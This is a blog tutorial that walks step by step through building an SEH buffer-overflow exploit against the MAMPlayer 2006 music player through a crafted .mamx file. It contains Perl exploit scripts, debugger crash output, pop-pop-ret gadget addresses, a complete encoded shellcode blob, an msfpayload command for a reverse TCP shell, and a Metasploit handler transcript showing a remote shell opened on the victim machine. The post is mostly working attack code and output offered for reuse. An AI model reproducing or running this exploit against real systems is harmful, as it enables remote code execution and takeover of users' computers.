Another SEH tutorial


Hackers For Charity

The application we will look at can be downloaded here.
http://www.musanim.com/player/MAMPlayer2006aug19_035.zip
The exploit has been documented here,
http://www.exploit-db.com/exploits/15901/
but we will go through the process of creating the exploit from scratch.
Credits to corelan for their great exploit writing tutorials

Confirm the crash seriously takes place. Fill buffer with around 5000 A`s

my $filename=”firstcrash.mamx”;
my $junk=”A”x5000;
my $payload=$junk;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the program with windbg as an executable and run it. Open the file firstcrash.mamx and the program crashes. Run f5 or g and confirm with !exchain that this is an SEH problem

0:000> g
(538.440): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=00000000 ecx=41414141 edx=7c9032bc esi=00000000 edi=00000000
eip=41414141 esp=0012f10c ebp=0012f12c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+0x414140f0:
41414141 ?? ???
0:000> !exchain
0012f120: ntdll!ExecuteHandler2+3a (7c9032bc)
0012f6b0: MAM2006+3c078 (0043c078)
0012f6ec: MAM2006+3c078 (0043c078)
0012fa60: +414140f0 (41414141)
Invalid exception stack at 41414141

Second, send the 5000`s characters with a metasploit pattern so that we can be able to determine where the exactly the crash takes place.

root@bt:/pentest/exploits/framework3/tools# ./pattern_create.rb 5000 > /home/chalo/pgm/sploitattion/fat/crash.mamx

Open mamplayer with windbg again and open the crash.mamx file. The application crashes again.Press f5 or g. and then run load the byakugan plugin from metasploit to determine the offset.

0:000> !load byakugan
[Byakugan] Successfully loaded!
0:000> !pattern_offset 5000
[Byakugan] Control of ecx at offset 116.
[Byakugan] Control of eip at offset 116.

We now need to get a pop pop ret address to use. we can check the dll`s that load for the mamaplayer application and we can use msfpescan in metasploit to look for a workable address. Checking windbg and we notice some dll`s that mamplayer uses

ModLoad: 72d20000 72d29000 C:\WINDOWS\system32\wdmaud.drv
ModLoad: 77920000 77a13000 C:\WINDOWS\system32\setupapi.dll
ModLoad: 72d10000 72d18000 C:\WINDOWS\system32\msacm32.drv
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 5ad70000 5ada8000 C:\WINDOWS\system32\uxtheme.dll
ModLoad: 10000000 10050000 C:\WINDOWS\system32\VBoxOGL.dll
ModLoad: 01780000 017c0000 C:\WINDOWS\system32\VBoxOGLcrutil.dll
ModLoad: 71ab0000 71ac7000 C:\WINDOWS\system32\WS2_32.dll
ModLoad: 71aa0000 71aa8000 C:\WINDOWS\system32\WS2HELP.dll

We copy over msacm32.drv to our linux box and use msfpescan to get addresses we can use as SEH

root@bt:/pentest/exploits/framework3# ./msfpescan -p /home/chalo/pgm/sploitattion/fat/msacm32.drv > /home/chalo/pgm/sploitattion/fat/memaddresses.txt
root@bt:/home/chalo/pgm/sploitattion/fat# cat memaddresses.txt | grep “pop edi; pop esi; “
0x72d11225 pop edi; pop esi; retn 0x000c
0x72d11f39 pop edi; pop esi; retn 0x0004
0x72d1263d pop edi; pop esi; retn 0x0008
0x72d1269c pop edi; pop esi; retn 0x0008

We now need to check how the stack looks like. We put breakpoints in our code

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xcc\xcc\xcc\xcc”;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”1234567890qwertyuiopasdfghjkl”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Lets check the stack.

0:000> g
(88.4ac): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa60 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa0f:
0012fa60 cc int 3
0:000> d eip
0012fa60 cc cc cc cc 39 1f d1 72-31 32 33 34 35 36 37 38 ….9..r12345678
0012fa70 39 30 61 62 63 64 65 66-67 68 69 6a 6b 6c 6d 6e 90abcdefghijklmn
0012fa80 6f 70 71 72 73 74 75 76-77 78 79 7a 44 44 44 44 opqrstuvwxyzDDDD
0012fa90 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad0 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Good, no spaces between our code. Now we just need to set our next seh handler(nseh) to jump 6 bytes. Replace the shellcode with break points .

my $filename=”crash3.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);
my $shellcode=”\xcc\xcc\xcc\xcc”;
my $junk2=”D” x300;

my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Checking the stack again

0:000> g
(3a8.5f0): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=72d11f39 edx=7c9032bc esi=0012f154 edi=7c9032a8
eip=0012fa68 esp=0012f07c ebp=0012f08c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
+0x12fa17:
0012fa68 cc int 3
0:000> d eip
0012fa68 cc cc cc cc 44 44 44 44-44 44 44 44 44 44 44 44 ….DDDDDDDDDDDD
0012fa78 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa88 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fa98 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012faa8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fab8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fac8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD
0012fad8 44 44 44 44 44 44 44 44-44 44 44 44 44 44 44 44 DDDDDDDDDDDDDDDD

Replace the breakpoints with real shellcode to pop a calc from msfpayload and pwn the application.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/exec EXITFUNC=seh CMD=calc.exe R | ./msfencode -e x86/alpha_upper -t c

So the new code becomes

my $filename=”crash5.mamx”;
my $junk=”A”x112;#116-4
my $nseh=”\xeb\x06\x90\x90″;
my $seh=pack(‘V’,0x72d11f39);

my $shellcode =
“\x89\xe1\xda\xcb\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43” .
“\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41” .
“\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42” .
“\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50” .
“\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x5a\x48\x4c\x49\x43\x30\x45” .
“\x50\x45\x50\x43\x50\x4b\x39\x5a\x45\x56\x51\x4e\x32\x52\x44” .
“\x4c\x4b\x56\x32\x56\x50\x4c\x4b\x51\x42\x54\x4c\x4c\x4b\x56” .
“\x32\x52\x34\x4c\x4b\x43\x42\x56\x48\x54\x4f\x4f\x47\x51\x5a” .
“\x51\x36\x56\x51\x4b\x4f\x50\x31\x4f\x30\x4e\x4c\x47\x4c\x43” .
“\x51\x43\x4c\x45\x52\x56\x4c\x47\x50\x49\x51\x58\x4f\x54\x4d” .
“\x45\x51\x4f\x37\x4b\x52\x4c\x30\x50\x52\x56\x37\x4c\x4b\x56” .
“\x32\x52\x30\x4c\x4b\x50\x42\x47\x4c\x45\x51\x4e\x30\x4c\x4b” .
“\x47\x30\x52\x58\x4d\x55\x49\x50\x52\x54\x50\x4a\x45\x51\x4e” .
“\x30\x56\x30\x4c\x4b\x50\x48\x54\x58\x4c\x4b\x56\x38\x47\x50” .
“\x45\x51\x4e\x33\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x50\x34\x4c” .
“\x4b\x43\x31\x49\x46\x50\x31\x4b\x4f\x56\x51\x4f\x30\x4e\x4c” .
“\x49\x51\x58\x4f\x54\x4d\x43\x31\x49\x57\x56\x58\x4b\x50\x54” .
“\x35\x4c\x34\x45\x53\x43\x4d\x4c\x38\x47\x4b\x43\x4d\x56\x44” .
“\x52\x55\x4d\x32\x51\x48\x4c\x4b\x50\x58\x47\x54\x45\x51\x49” .
“\x43\x45\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x45\x4c” .
“\x43\x31\x58\x53\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x58\x50\x4b” .
“\x39\x50\x44\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x51\x49” .
“\x51\x4a\x56\x31\x4b\x4f\x4b\x50\x51\x48\x51\x4f\x51\x4a\x4c” .
“\x4b\x45\x42\x5a\x4b\x4d\x56\x51\x4d\x43\x5a\x43\x31\x4c\x4d” .
“\x4c\x45\x4e\x59\x43\x30\x45\x50\x45\x50\x56\x30\x43\x58\x56” .
“\x51\x4c\x4b\x52\x4f\x4c\x47\x4b\x4f\x49\x45\x4f\x4b\x4b\x4e” .
“\x54\x4e\x47\x42\x4b\x5a\x52\x48\x49\x36\x5a\x35\x4f\x4d\x4d” .
“\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x43\x4c\x45\x5a\x4b\x30” .
“\x4b\x4b\x4d\x30\x43\x45\x54\x45\x4f\x4b\x50\x47\x54\x53\x52” .
“\x52\x52\x4f\x43\x5a\x45\x50\x56\x33\x4b\x4f\x49\x45\x43\x53” .
“\x43\x51\x52\x4c\x52\x43\x56\x4e\x45\x35\x52\x58\x43\x55\x43” .
“\x30\x54\x4a\x41\x41″;

my $junk2=”D” x300;
my $payload=$junk.$nseh.$seh.$shellcode.$junk2;
open($FILE,”>$filename”);
print $FILE $payload;
close($FILE);

Open the file with the application and you will be able to pop a calc. You can modify the shellcode to do taks such as reverse shell on a tcp port.

chalo@bt:/pentest/exploits/framework3$ ./msfpayload windows/shell/reverse_tcp EXITFUNC=seh LHOST=192.168.10.1 LPORT=4444 R | ./msfencode -e x86/alpha_upper -t c

Then change your shellcode above from calc to the new shellcode for reverse shell. Set up your metasploit listener first and then after that open the new file with mamplayer . Boom !!!! šŸ™‚ You get your reverse shell back


msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(handler) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–

Payload options (windows/shell/reverse_tcp):

Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC process yes Exit technique: seh, thread, none, process
LHOST yes The listen address
LPORT 4444 yes The listen port

Exploit target:

Id Name
— —-
0 Wildcard Target

msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > set EXITFUNC seh
EXITFUNC => seh
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.10.1:4444
[*] Starting the payload handler…
[*] Sending stage (240 bytes) to 192.168.10.130
[*] Command shell session 1 opened (192.168.10.1:4444 -> 192.168.10.130:1032) at Wed Jan 12 12:27:51 +0300 2011

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\bb\Desktop\rr\fat>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.10.130
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :

C:\Documents and Settings\bb\Desktop\rr\fat>

Advertisements
This entry was posted in Uncategorized. Bookmark the permalink.

2 Responses to Another SEH tutorial

  1. Bright Gameli says:

    Dope stuff man….I like I like I like!!!!!!!!!!!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s